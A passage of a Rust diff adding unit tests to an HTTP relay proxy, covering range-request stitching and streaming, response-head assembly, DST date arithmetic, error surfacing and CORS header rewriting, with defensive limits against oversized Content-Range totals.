+        // shape, surface that error message specifically rather than
+        // letting it through as an unparseable 502 — the message string
+        // is what tells the user what went wrong (placeholder PSK, bad
+        // URL, unauthorized, etc.).
+        let envelope = br#"{"e":"unauthorized"}"#;
+        let err = parse_exit_node_response(envelope).expect_err("must surface error");
+        let msg = err.to_string();
+        assert!(msg.contains("unauthorized"), "got: {}", msg);
+        assert!(msg.contains("exit node"), "got: {}", msg);
+    }
 
     #[test]
     fn unix_to_ymd_utc_handles_known_epochs() {
@@ -2227,12 +5186,47 @@ mod tests {
     }
 
     #[test]
-    fn seconds_until_utc_midnight_is_bounded() {
-        let n = seconds_until_utc_midnight();
+    fn seconds_until_pacific_midnight_is_bounded() {
+        let n = seconds_until_pacific_midnight();
         // Must be in (0, 86400] for any valid system clock.
         assert!(n > 0 && n <= 86_400);
     }
 
+    #[test]
+    fn nth_sunday_of_month_anchors() {
+        // Known Sundays as (year, month, n, expected day-of-month). An
+        // error in the weekday/offset arithmetic would silently move the
+        // DST transition by a week in either direction.
+        let cases = [
+            (2026, 3, 2, 8),   // Mar 2026: Sundays on the 1st and 8th
+            (2026, 11, 1, 1),  // Nov 2026 starts on a Sunday
+            (2024, 3, 2, 10),  // Mar 2024: Sundays on the 3rd and 10th
+            (2024, 11, 1, 3),  // Nov 2024: first Sunday is the 3rd
+            (2027, 3, 2, 14),  // Mar 2027: second Sunday is the 14th
+        ];
+        for (year, month, n, day) in cases {
+            assert_eq!(nth_sunday_of_month(year, month, n), day);
+        }
+    }
+
+    #[test]
+    fn pacific_dst_window_anchors() {
+        // All dates are in 2026, where the tests expect PDT from Mar 8
+        // (second Sunday of March) up to, but excluding, Nov 1.
+        // Standard time (PST): winter days, the day before the March
+        // switch, and everything from the first Sunday of November on.
+        let pst = [(1, 15), (12, 25), (2, 28), (11, 5), (3, 7), (11, 1)];
+        // Daylight time (PDT): summer days plus both ends of the window
+        // (Mar 8 and Oct 31).
+        let pdt = [(6, 1), (9, 30), (3, 8), (10, 31)];
+        for (month, day) in pst {
+            assert!(!pacific_is_dst(2026, month, day), "{}/{} should be PST", month, day);
+        }
+        for (month, day) in pdt {
+            assert!(pacific_is_dst(2026, month, day), "{}/{} should be PDT", month, day);
+        }
+    }
+
     #[test]
     fn filter_forwarded_headers_strips_identity_revealing_headers() {
         // Issue #104: any proxy/extension that inserts these must not
@@ -2429,34 +5423,878 @@ mod tests {
     }
 
     #[test]
-    fn validate_probe_range_rejects_body_length_mismatch() {
-        let headers = vec![("Content-Range".to_string(), "bytes 0-4/20".to_string())];
-        assert!(validate_probe_range(206, &headers, b"hey", 4).is_none());
-    }
+    fn validate_probe_range_accepts_decoded_full_entity_body_mismatch() {
+        let mut raw = b"HTTP/1.1 206 Partial Content\r\n\
+Content-Range: bytes 0-11247/11248\r\n\
+Content-Type: text/javascript\r\n\
+Vary: Accept-Encoding\r\n\
+Content-Length: 45812\r\n\r\n"
+            .to_vec();
+        raw.extend(std::iter::repeat(b'x').take(45_812));
+
+        let (status, headers, body) = split_response(&raw).unwrap();
+        assert_eq!(
+            validate_probe_range(status, &headers, body, RANGE_PARALLEL_CHUNK_BYTES - 1),
+            Some(ContentRange {
+                start: 0,
+                end: 11_247,
+                total: 11_248,
+            }),
+        );
 
-    #[test]
-    fn stitched_range_capacity_rejects_absurd_total() {
+        let rewritten = rewrite_206_to_200(&raw);
+        let (status, headers, body) = split_response(&rewritten).unwrap();
+        assert_eq!(status, 200);
+        assert_eq!(body.len(), 45_812);
+        assert!(!headers
+            .iter()
+            .any(|(k, _)| k.eq_ignore_ascii_case("content-range")));
         assert_eq!(
-            checked_stitched_range_capacity(MAX_STITCHED_RANGE_BYTES),
-            Some(MAX_STITCHED_RANGE_BYTES as usize),
+            headers
+                .iter()
+                .find(|(k, _)| k.eq_ignore_ascii_case("content-length"))
+                .map(|(_, v)| v.as_str()),
+            Some("45812"),
         );
-        assert_eq!(checked_stitched_range_capacity(MAX_STITCHED_RANGE_BYTES + 1), None);
-        assert_eq!(checked_stitched_range_capacity(u64::MAX), None);
     }
 
     #[test]
-    fn extract_exact_range_body_rejects_mismatched_content_range() {
-        let raw = b"HTTP/1.1 206 Partial Content\r\n\
-Content-Range: bytes 5-9/20\r\n\
-Content-Length: 5\r\n\r\n\
-hello";
-        let err = extract_exact_range_body(raw, 10, 14, 20).unwrap_err();
-        assert_eq!(err, "unexpected Content-Range");
+    fn validate_probe_range_rejects_missing_content_range() {
+        assert!(validate_probe_range(206, &[], b"hello", 4).is_none());
     }
 
     #[test]
-    fn parse_relay_error_field() {
-        let body = r#"{"e":"unauthorized"}"#;
+    fn validate_probe_range_rejects_nonzero_start() {
+        let headers = vec![("Content-Range".to_string(), "bytes 1-4/20".to_string())];
+        assert!(validate_probe_range(206, &headers, b"hell", 4).is_none());
+    }
+
+    #[test]
+    fn validate_probe_range_rejects_end_past_requested_end() {
+        let headers = vec![("Content-Range".to_string(), "bytes 0-5/20".to_string())];
+        assert!(validate_probe_range(206, &headers, b"hello!", 4).is_none());
+    }
+
+    #[test]
+    fn validate_probe_range_rejects_body_length_mismatch() {
+        let headers = vec![("Content-Range".to_string(), "bytes 0-4/20".to_string())];
+        assert!(validate_probe_range(206, &headers, b"hey", 4).is_none());
+    }
+
+    #[test]
+    fn extract_exact_range_body_rejects_body_length_mismatch() {
+        let raw = b"HTTP/1.1 206 Partial Content\r\n\
+Content-Range: bytes 5-9/20\r\n\
+Content-Length: 3\r\n\r\n\
+hey";
+        let err = extract_exact_range_body(raw, 5, 9, 20).unwrap_err();
+        assert_eq!(err, "Content-Range/body length mismatch");
+    }
+
+    #[test]
+    fn extract_exact_range_body_rejects_mismatched_content_range() {
+        let raw = b"HTTP/1.1 206 Partial Content\r\n\
+Content-Range: bytes 5-9/20\r\n\
+Content-Length: 5\r\n\r\n\
+hello";
+        let err = extract_exact_range_body(raw, 10, 14, 20).unwrap_err();
+        assert_eq!(err, "unexpected Content-Range");
+    }
+
+    #[test]
+    fn assemble_200_head_uses_declared_length_and_strips_range_meta() {
+        // Streaming path passes `total` (full file size) as the declared
+        // length even though the body hasn't been assembled yet. The head
+        // block must carry that as Content-Length and must NOT carry the
+        // probe's Content-Range (would mark response as partial and
+        // clients would reject mid-stream chunks past the probe's end).
+        let probe_headers = vec![
+            ("Content-Type".to_string(), "application/octet-stream".to_string()),
+            ("Content-Range".to_string(), "bytes 0-262143/109605203".to_string()),
+            ("Content-Length".to_string(), "262144".to_string()),
+            ("Content-Encoding".to_string(), "gzip".to_string()),
+            ("Transfer-Encoding".to_string(), "chunked".to_string()),
+            ("Connection".to_string(), "close".to_string()),
+            ("Cache-Control".to_string(), "max-age=300".to_string()),
+        ];
+        let head = assemble_200_head(&probe_headers, 109_605_203);
+        let s = std::str::from_utf8(&head).unwrap();
+        assert!(s.starts_with("HTTP/1.1 200 OK\r\n"));
+        assert!(s.ends_with("\r\n\r\n"));
+        assert!(s.contains("Content-Length: 109605203\r\n"));
+        // Hop-by-hop and content-meta the buffered path strips must
+        // ALSO be stripped by the streaming head (else range responses
+        // would mislead clients).
+        assert!(!s.contains("Content-Range:"));
+        assert!(!s.contains("Content-Encoding:"));
+        assert!(!s.contains("Transfer-Encoding:"));
+        assert!(!s.contains("Connection:"));
+        // Original Content-Length from the probe must NOT survive —
+        // we computed our own from `total`.
+        assert!(!s.contains("Content-Length: 262144\r\n"));
+        // Non-stripped headers pass through.
+        assert!(s.contains("Content-Type: application/octet-stream\r\n"));
+        assert!(s.contains("Cache-Control: max-age=300\r\n"));
+    }
+
+    #[test]
+    fn assemble_200_head_matches_full_200_head_for_buffered_path() {
+        // The two assemblers must agree on header semantics so a
+        // response taken via the buffered path is byte-identical (in
+        // its head block) to the same response taken via the streaming
+        // path. Lock that in here so future header-skip changes don't
+        // drift between the two.
+        let headers = vec![
+            ("Content-Type".to_string(), "text/html".to_string()),
+            ("Content-Range".to_string(), "bytes 0-9/10".to_string()),
+            ("X-Custom".to_string(), "foo".to_string()),
+        ];
+        let body = b"helloworld";
+        let full = assemble_full_200(&headers, body);
+        let head_only = assemble_200_head(&headers, body.len() as u64);
+        let sep = b"\r\n\r\n";
+        let idx = full.windows(sep.len()).position(|w| w == sep).unwrap();
+        assert_eq!(&full[..idx + sep.len()], head_only.as_slice());
+    }
+
+    #[tokio::test]
+    async fn write_response_with_head_transform_applies_to_head_not_body() {
+        // The bridge between writer-based API and the buffered/error
+        // paths: head gets the transform; body bytes are forwarded
+        // unchanged so binary payloads aren't corrupted by an
+        // accidental UTF-8 round-trip in the transform path.
+        let response = b"HTTP/1.1 200 OK\r\nContent-Type: app/octet-stream\r\nContent-Length: 4\r\n\r\n\x00\x01\x02\xff";
+        let mut buf: Vec<u8> = Vec::new();
+        let transform = |head: &[u8]| -> Vec<u8> {
+            // Tag the head so we can prove the transform ran on it.
+            // Strip the trailing CRLFCRLF terminator, append a new
+            // header line, then restore the terminator.
+            let sep = b"\r\n\r\n";
+            let mut out = head.strip_suffix(sep).unwrap_or(head).to_vec();
+            out.extend_from_slice(b"\r\nX-Tag: yes\r\n\r\n");
+            out
+        };
+        write_response_with_head_transform(&mut buf, response, &transform)
+            .await
+            .unwrap();
+        let sep_pos = buf.windows(4).position(|w| w == b"\r\n\r\n").unwrap();
+        let (head, body) = (&buf[..sep_pos + 4], &buf[sep_pos + 4..]);
+        let head_s = std::str::from_utf8(head).unwrap();
+        assert!(head_s.contains("X-Tag: yes\r\n"));
+        // Body is byte-identical — no UTF-8 lossy conversion.
+        assert_eq!(body, b"\x00\x01\x02\xff");
+    }
+
+    #[tokio::test]
+    async fn write_response_with_head_transform_passes_through_when_no_terminator() {
+        // Defensive: a payload missing `\r\n\r\n` (corrupted upstream,
+        // raw error blob) must be forwarded byte-identical so we don't
+        // synthesise a fake header for non-HTTP/1.x bytes.
+        let response = b"not an http response";
+        let mut buf: Vec<u8> = Vec::new();
+        let transform = |_: &[u8]| -> Vec<u8> { b"XX".to_vec() };
+        write_response_with_head_transform(&mut buf, response, &transform)
+            .await
+            .unwrap();
+        assert_eq!(buf.as_slice(), response);
+    }
+
+    #[test]
+    fn plan_remaining_ranges_basic_chunking() {
+        // probe covered 0..=3 of a 20-byte file at 5-byte chunks →
+        // remaining ranges are 4-8, 9-13, 14-18, 19-19.
+        let ranges: Vec<_> = plan_remaining_ranges(3, 20, 5).collect();
+        assert_eq!(ranges, vec![(4, 8), (9, 13), (14, 18), (19, 19)]);
+    }
+
+    #[test]
+    fn plan_remaining_ranges_yields_nothing_when_probe_covers_everything() {
+        // Defensive: even though the caller is supposed to short-circuit
+        // when the probe covers the entity, the iterator itself must be
+        // a no-op rather than emit a bogus 0-length range.
+        let ranges: Vec<_> = plan_remaining_ranges(19, 20, 5).collect();
+        assert!(ranges.is_empty());
+    }
+
+    #[test]
+    fn plan_remaining_ranges_handles_huge_total_lazily_without_oom() {
+        // Regression for the DoS introduced when the buffered+streaming
+        // refactor (1.9.23) initially built the full ranges Vec before
+        // branching on size. A hostile origin advertising
+        // `Content-Range: bytes 0-262143/<huge>` can pass the probe
+        // checks (matching 256 KiB body, valid total) and used to drive
+        // ~6 GB of `Vec<(u64, u64)>` allocation for a 100 TiB total.
+        //
+        // Lazy iteration must let us pull a bounded number of items
+        // from a u64::MAX-sized total without panicking or allocating
+        // the whole plan. Pulling 10 items proves we never materialised
+        // ~2^46 of them (2^64 / 2^18) up front.
+        let total = u64::MAX;
+        let chunk = 256 * 1024;
+        let probe_end = chunk - 1;
+        let first_ten: Vec<_> = plan_remaining_ranges(probe_end, total, chunk).take(10).collect();
+        assert_eq!(first_ten.len(), 10);
+        // First range starts right after the probe.
+        assert_eq!(first_ten[0].0, probe_end + 1);
+        // Each range covers exactly one chunk except possibly the last
+        // — which here can't be the tail because we only took 10.
+        for (s, e) in &first_ten {
+            assert_eq!(e - s + 1, chunk);
+        }
+        // Successive ranges are contiguous.
+        for w in first_ten.windows(2) {
+            assert_eq!(w[1].0, w[0].1 + 1);
+        }
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_writes_head_probe_then_chunks_in_order() {
+        // Happy path: streaming writer must emit
+        //   head + probe_body + chunk1_body + chunk2_body + …
+        // in input order so a download client reading byte 0 onward
+        // sees a coherent response.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n";
+        let probe = b"AB";
+        // The streaming function consumes whatever `Stream` it's given;
+        // tests feed it `stream::iter` of synthetic chunk results so
+        // we exercise the writer + ordering logic without needing a
+        // live DomainFronter / Apps Script.
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Ok::<Vec<u8>, &'static str>(b"GHIJ".to_vec())),
+        ]);
+        let mut buf = Vec::new();
+        stream_chunks_to_writer(
+            &mut VecAsyncWriter(&mut buf),
+            head,
+            probe,
+            10,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await
+        .unwrap();
+        // Whole wire output: head, then probe body, then chunks in
+        // input order — no chunk reordered to "fastest first."
+        let expected: Vec<u8> = [head.as_slice(), probe.as_slice(), b"CDEF", b"GHIJ"].concat();
+        assert_eq!(buf, expected);
+    }
+
+    #[test]
+    fn dispatch_range_response_wrapper_buffers_through_64mib_ceiling() {
+        // Pre-1.9.23 behavior preservation: `relay_parallel_range ->
+        // Vec<u8>` used to stitch range-capable responses up to the
+        // old `MAX_STITCHED_RANGE_BYTES` cap of 64 MiB. The first
+        // round of this PR collapsed that cap into the new 40 MiB
+        // streaming threshold, regressing 40-64 MiB downloads
+        // through the wrapper (Apps Script's single-GET path returns
+        // 502/504 above ~40 MiB). Restored via separate constants:
+        // wrapper stays buffered up to BUFFERED_STITCH_MAX_BYTES,
+        // not APPS_SCRIPT_BODY_MAX_BYTES.
+        assert_eq!(
+            dispatch_range_response(40 * 1024 * 1024, false),
+            RangeDispatch::Buffered,
+        );
+        assert_eq!(
+            dispatch_range_response(50 * 1024 * 1024, false),
+            RangeDispatch::Buffered,
+        );
+        assert_eq!(
+            dispatch_range_response(BUFFERED_STITCH_MAX_BYTES, false),
+            RangeDispatch::Buffered,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_wrapper_falls_back_above_buffered_cap() {
+        // Lock-in for the Vec<u8> wrapper contract (Issue #162):
+        // above the buffered ceiling the wrapper MUST NOT take the
+        // streaming branch (which would emit a partial 200 OK that
+        // a `Vec<u8>` consumer can't react to). Above the buffered
+        // cap, fall back to single GET — same path the pre-1.9.23
+        // wrapper took above its 64 MiB cliff.
+        assert_eq!(
+            dispatch_range_response(BUFFERED_STITCH_MAX_BYTES + 1, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+        assert_eq!(
+            dispatch_range_response(100 * 1024 * 1024, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+        assert_eq!(
+            dispatch_range_response(u64::MAX, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_writer_api_streams_above_apps_script_ceiling() {
+        // Writer-based API contract: streams above the Apps Script
+        // single-GET ceiling so large downloads (>40 MiB) actually
+        // deliver. Without this, we'd be back to the pre-fix 504
+        // timeout for the 104 MiB DMG that motivated #1042. The
+        // writer API streams in the 40-64 MiB band too (where the
+        // wrapper would still buffer): that's intentional — on
+        // chunk failure, streaming truncates and the download client
+        // resumes via Range, while the buffered path's fallback
+        // can't recover at this size anyway.
+        //
+        // Upper bound is the streaming cap MAX_STREAMED_RANGE_BYTES
+        // (quota-DoS guard); above it, see
+        // `dispatch_range_response_rejects_streamed_totals_above_streaming_cap`.
+        assert_eq!(
+            dispatch_range_response(APPS_SCRIPT_BODY_MAX_BYTES + 1, true),
+            RangeDispatch::Stream,
+        );
+        assert_eq!(
+            dispatch_range_response(50 * 1024 * 1024, true),
+            RangeDispatch::Stream,
+        );
+        assert_eq!(
+            dispatch_range_response(BUFFERED_STITCH_MAX_BYTES + 1, true),
+            RangeDispatch::Stream,
+        );
+        // Exactly at the streaming cap (inclusive bound) still streams.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES, true),
+            RangeDispatch::Stream,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_rejects_streamed_totals_above_streaming_cap() {
+        // Quota-DoS guard for the writer API: a hostile origin can
+        // advertise an absurd Content-Range total (e.g. u64::MAX) and
+        // pass the probe checks with a normal-sized first-chunk body,
+        // making us issue chunk Apps Script calls until the client
+        // disconnects. Each call counts toward the daily quota
+        // (~20 k requests/day free tier), so an unattended hostile
+        // download would lock the user out of the relay. Refuse
+        // anything above MAX_STREAMED_RANGE_BYTES instead of
+        // streaming.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES + 1, true),
+            RangeDispatch::RejectTooLarge,
+        );
+        assert_eq!(
+            dispatch_range_response(u64::MAX, true),
+            RangeDispatch::RejectTooLarge,
+        );
+        // At the cap, streaming is still allowed. The boundary is
+        // strict greater-than so the constant itself is reachable.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES, true),
+            RangeDispatch::Stream,
+        );
+        // Wrapper (streaming_allowed=false) hits its own
+        // BUFFERED_STITCH_MAX_BYTES cliff far below MAX_STREAMED_…,
+        // so any oversized total routes to FallbackSingleGet (Apps
+        // Script's single-GET will reject it naturally), not to
+        // RejectTooLarge.
+        assert_eq!(
+            dispatch_range_response(MAX_STREAMED_RANGE_BYTES + 1, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+        assert_eq!(
+            dispatch_range_response(u64::MAX, false),
+            RangeDispatch::FallbackSingleGet,
+        );
+    }
+
+    #[test]
+    fn dispatch_range_response_at_or_below_apps_script_ceiling_stays_buffered() {
+        // At or below the Apps Script ceiling, both API surfaces stay
+        // buffered — the buffered path has a real recovery story (a
+        // chunk failure falls back to single GET, which delivers a
+        // complete file when ≤ 40 MiB).
+        for streaming_allowed in [true, false] {
+            assert_eq!(
+                dispatch_range_response(APPS_SCRIPT_BODY_MAX_BYTES, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+            assert_eq!(
+                dispatch_range_response(1024 * 1024, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+            assert_eq!(
+                dispatch_range_response(1, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+            assert_eq!(
+                dispatch_range_response(0, streaming_allowed),
+                RangeDispatch::Buffered,
+            );
+        }
+    }
+
+    /// Test-only `AsyncWrite` that records the byte-offset of every
+    /// `poll_flush` call. Used to verify
+    /// `stream_chunks_to_writer` flushes the committed prefix before
+    /// surfacing a chunk-validation error — critical for TLS streams
+    /// where the partial body sits in the TLS writer's in-memory
+    /// buffer and would otherwise be dropped on connection close.
+    struct FlushTrackingWriter {
+        buf: Vec<u8>,
+        /// Value of `buf.len()` captured at each `poll_flush` call,
+        /// i.e. how many bytes had been written when that flush ran.
+        /// Lets a test assert "flush happened after byte N had been written."
+        flushed_at: Vec<usize>,
+    }
+
+    impl FlushTrackingWriter {
+        fn new() -> Self {
+            Self { buf: Vec::new(), flushed_at: Vec::new() }
+        }
+    }
+
+    impl tokio::io::AsyncWrite for FlushTrackingWriter {
+        fn poll_write(
+            self: std::pin::Pin<&mut Self>,
+            _: &mut std::task::Context<'_>,
+            buf: &[u8],
+        ) -> std::task::Poll<std::io::Result<usize>> {
+            self.get_mut().buf.extend_from_slice(buf);
+            std::task::Poll::Ready(Ok(buf.len()))
+        }
+        fn poll_flush(
+            self: std::pin::Pin<&mut Self>,
+            _: &mut std::task::Context<'_>,
+        ) -> std::task::Poll<std::io::Result<()>> {
+            let me = self.get_mut();
+            let at = me.buf.len();
+            me.flushed_at.push(at);
+            std::task::Poll::Ready(Ok(()))
+        }
+        fn poll_shutdown(
+            self: std::pin::Pin<&mut Self>,
+            _: &mut std::task::Context<'_>,
+        ) -> std::task::Poll<std::io::Result<()>> {
+            std::task::Poll::Ready(Ok(()))
+        }
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_flushes_before_returning_chunk_error() {
+        // TLS-safety lock-in: chunk-validation failure surfaces as
+        // `Err`, and the caller (proxy_server.rs) typically uses `?`
+        // to propagate — which means the post-error `stream.flush()`
+        // in the caller never runs. Without the in-function flush,
+        // bytes buffered inside the TLS writer get dropped when the
+        // connection closes, and the download client sees a clean
+        // empty body instead of the partial prefix it needs to
+        // resume via Range. This test asserts flush() is called
+        // after the committed prefix bytes have been written and
+        // before the function returns.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\n";
+        let probe = b"AB";
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Err::<Vec<u8>, &'static str>("validation failure")),
+        ]);
+        let mut writer = FlushTrackingWriter::new();
+        let result = stream_chunks_to_writer(
+            &mut writer,
+            head,
+            probe,
+            12,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await;
+        assert!(result.is_err());
+
+        // Bytes written before the failure: head + probe + first
+        // chunk = head_len + 2 + 4.
+        let expected_committed = head.len() + 2 + 4;
+        assert_eq!(writer.buf.len(), expected_committed);
+
+        // Flush must have been called after the committed prefix
+        // was in place — i.e., at the same byte count as `buf.len()`.
+        assert!(
+            writer.flushed_at.iter().any(|&at| at == expected_committed),
+            "flush() must run after committed prefix is written; flushed_at={:?}, expected at byte {}",
+            writer.flushed_at,
+            expected_committed,
+        );
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn stream_chunks_to_writer_emits_progress_log_at_each_16mib_boundary() {
+        // User feedback on PR #1085: large streamed downloads went
+        // silent in the logs between "starting N chunks" and
+        // completion, with no progress signal. This test locks in
+        // the periodic progress lines by capturing the tracing
+        // output of a synthetic 40 MiB stream and counting how many
+        // `range-parallel-stream:` lines mention "MiB" (the progress
+        // lines do; the start-up summary phrases it differently).
+        //
+        // At 40 MiB total and 16 MiB intervals we expect two
+        // crossings — at 16 MiB and 32 MiB. Strictly *not* one at
+        // 0 MiB (the threshold must be reached, not just initialised)
+        // and *not* one at 40 MiB (40 < next_progress_log_at=48 once
+        // we've crossed 32 MiB).
+        use futures_util::stream;
+        use std::sync::{Arc, Mutex};
+        use tracing_subscriber::fmt::MakeWriter;
+
+        #[derive(Clone, Default)]
+        struct LogCapture(Arc<Mutex<Vec<u8>>>);
+        impl std::io::Write for LogCapture {
+            fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
+                self.0.lock().unwrap().extend_from_slice(buf);
+                Ok(buf.len())
+            }
+            fn flush(&mut self) -> std::io::Result<()> {
+                Ok(())
+            }
+        }
+        impl<'a> MakeWriter<'a> for LogCapture {
+            type Writer = Self;
+            fn make_writer(&'a self) -> Self::Writer {
+                self.clone()
+            }
+        }
+
+        let capture = LogCapture::default();
+        let subscriber = tracing_subscriber::fmt()
+            .with_writer(capture.clone())
+            .with_max_level(tracing::Level::INFO)
+            .with_ansi(false)
+            .with_target(false)
+            .finish();
+        let _guard = tracing::subscriber::set_default(subscriber);
+
+        // 40 MiB total. Probe is one 256 KiB chunk; the rest of the
+        // file is 159 same-sized chunks fed as a synthetic stream.
+        let chunk_size: u64 = 256 * 1024;
+        let total: u64 = 40 * 1024 * 1024;
+        let probe_body = vec![0u8; chunk_size as usize];
+        let mut chunks_data: Vec<(u64, u64, Result<Vec<u8>, &'static str>)> = Vec::new();
+        let mut start = chunk_size;
+        while start < total {
+            let end = (start + chunk_size - 1).min(total - 1);
+            let len = (end - start + 1) as usize;
+            chunks_data.push((start, end, Ok(vec![0u8; len])));
+            start = end + 1;
+        }
+        let head = format!("HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n", total).into_bytes();
+
+        let mut buf: Vec<u8> = Vec::new();
+        stream_chunks_to_writer(
+            &mut VecAsyncWriter(&mut buf),
+            &head,
+            &probe_body,
+            total,
+            stream::iter(chunks_data),
+            "https://example.test/big",
+        )
+        .await
+        .unwrap();
+        // Wire output sanity: head + 40 MiB body, exactly.
+        assert_eq!(buf.len() as u64, head.len() as u64 + total);
+
+        // Inspect the captured log. The two progress lines should
+        // mention `16/40` and `32/40` (MiB emitted / MiB total).
+        // Drop the subscriber guard so any inadvertent log lines
+        // from drop-handlers don't race with our read.
+        drop(_guard);
+        let log = String::from_utf8(capture.0.lock().unwrap().clone()).unwrap();
+        let progress_lines: Vec<&str> = log
+            .lines()
+            .filter(|l| l.contains("range-parallel-stream:") && l.contains(" MiB ("))
+            .collect();
+        assert_eq!(
+            progress_lines.len(),
+            2,
+            "expected 2 progress lines at the 16 / 32 MiB crossings; full log:\n{}",
+            log,
+        );
+        assert!(
+            progress_lines[0].contains("16/40 MiB (40%)"),
+            "first progress line should read 16/40 MiB (40%); got: {}",
+            progress_lines[0],
+        );
+        assert!(
+            progress_lines[1].contains("32/40 MiB (80%)"),
+            "second progress line should read 32/40 MiB (80%); got: {}",
+            progress_lines[1],
+        );
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_flushes_after_head_and_probe_for_first_byte_latency() {
+        // "First bytes quickly" lock-in: after writing head + probe
+        // body, the function must flush before going into the
+        // chunk-fetch loop. Without this, the response start
+        // (status code, headers, first 256 KiB of body) may sit in
+        // intermediate buffers (TLS writer, kernel send buffer with
+        // small initial cwnd, intermediate proxy buffers) while we
+        // round-trip ~2s/chunk to Apps Script for the remaining
+        // chunks — giving the user a "stuck at 0%" progress bar
+        // for hundreds of ms to seconds on a multi-MiB download.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 14\r\n\r\n";
+        let probe = b"AB";
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Ok::<Vec<u8>, &'static str>(b"GHIJ".to_vec())),
+            (10u64, 13u64, Ok::<Vec<u8>, &'static str>(b"KLMN".to_vec())),
+        ]);
+        let mut writer = FlushTrackingWriter::new();
+        stream_chunks_to_writer(
+            &mut writer,
+            head,
+            probe,
+            14,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await
+        .unwrap();
+
+        // At least one flush must land at byte offset = head + probe
+        // (BEFORE any chunk bytes), proving the early flush ran.
+        let head_plus_probe = head.len() + probe.len();
+        assert!(
+            writer.flushed_at.iter().any(|&at| at == head_plus_probe),
+            "early flush must run after head+probe but before chunks; flushed_at={:?}, expected at byte {}",
+            writer.flushed_at,
+            head_plus_probe,
+        );
+    }
+
+    #[tokio::test]
+    async fn streaming_branch_with_real_cors_transform_emits_acl_headers_then_body() {
+        // Cross-module integration test: the streaming branch's
+        // `transform_head` closure is wired up in proxy_server.rs
+        // from the request's Origin header to call
+        // `inject_cors_into_head`. Helper tests cover the head
+        // assembler and the CORS rewriter in isolation; this test
+        // composes them as the production proxy dispatch does, so
+        // a regression in either the closure construction or the
+        // head-only CORS variant surfaces here.
+        use crate::proxy_server::inject_cors_into_head;
+        use futures_util::stream::{self, StreamExt as _};
+
+        let cors_origin: Option<String> = Some("https://www.youtube.com".to_string());
+        // Same closure the proxy_server dispatch uses (see
+        // proxy_server.rs `handle_mitm_request`).
+        let transform = |head: &[u8]| -> Vec<u8> {
+            match cors_origin.as_deref() {
+                Some(o) => inject_cors_into_head(head, o).unwrap_or_else(|| head.to_vec()),
+                None => head.to_vec(),
+            }
+        };
+
+        let probe_headers = vec![
+            ("Content-Type".to_string(), "application/octet-stream".to_string()),
+            ("Content-Range".to_string(), "bytes 0-3/12".to_string()),
+            // Upstream sent `Access-Control-Allow-Origin: *` with
+            // credentials — exactly the YouTube comments failure mode
+            // `inject_cors_response_headers` was added to fix. The streaming-path
+            // CORS variant must strip this and substitute the request origin.
+            ("Access-Control-Allow-Origin".to_string(), "*".to_string()),
+        ];
+        let probe_body = b"ABCD";
+        let chunks = stream::iter(vec![
+            (4u64, 7u64, Ok::<Vec<u8>, &'static str>(b"EFGH".to_vec())),
+            (8u64, 11u64, Ok::<Vec<u8>, &'static str>(b"IJKL".to_vec())),
+        ]);
+        let mut buf: Vec<u8> = Vec::new();
+        stream_range_response_to(
+            &mut VecAsyncWriter(&mut buf),
+            &probe_headers,
+            probe_body,
+            12,
+            chunks.map(|x| x),
+            &transform,
+            "https://example.test/big-file",
+        )
+        .await
+        .unwrap();
+
+        let sep_pos = buf.windows(4).position(|w| w == b"\r\n\r\n").expect("head terminator");
+        let head_s = std::str::from_utf8(&buf[..sep_pos + 4]).unwrap();
+        let body = &buf[sep_pos + 4..];
+
+        // Wildcard origin is gone; request origin is echoed.
+        assert!(
+            !head_s.contains("Access-Control-Allow-Origin: *"),
+            "wildcard origin must be stripped, head was: {}", head_s,
+        );
+        assert!(head_s.contains("Access-Control-Allow-Origin: https://www.youtube.com\r\n"));
+        assert!(head_s.contains("Access-Control-Allow-Credentials: true\r\n"));
+        assert!(head_s.contains("Vary: Origin\r\n"));
+        // Synthesised Content-Length = full advertised total.
+        assert!(head_s.contains("Content-Length: 12\r\n"));
+        // Body unaffected by the head transform; chunks in order.
+        assert_eq!(body, b"ABCDEFGHIJKL");
+    }
+
+    #[tokio::test]
+    async fn stream_range_response_to_assembles_head_from_probe_and_streams_chunks() {
+        // End-to-end check of the composition performed by
+        // `stream_range_response_to`, the free function behind the
+        // streaming branch of `do_relay_parallel_range_to`. Inputs:
+        // the probe's response headers, the probe's body (first
+        // slice), the advertised total, and a stream of the
+        // remaining chunk results. Expected output:
+        //   1. A response head derived from the probe headers
+        //      (`assemble_200_head`): Content-Type etc. kept,
+        //      Content-Range dropped, Content-Length = total.
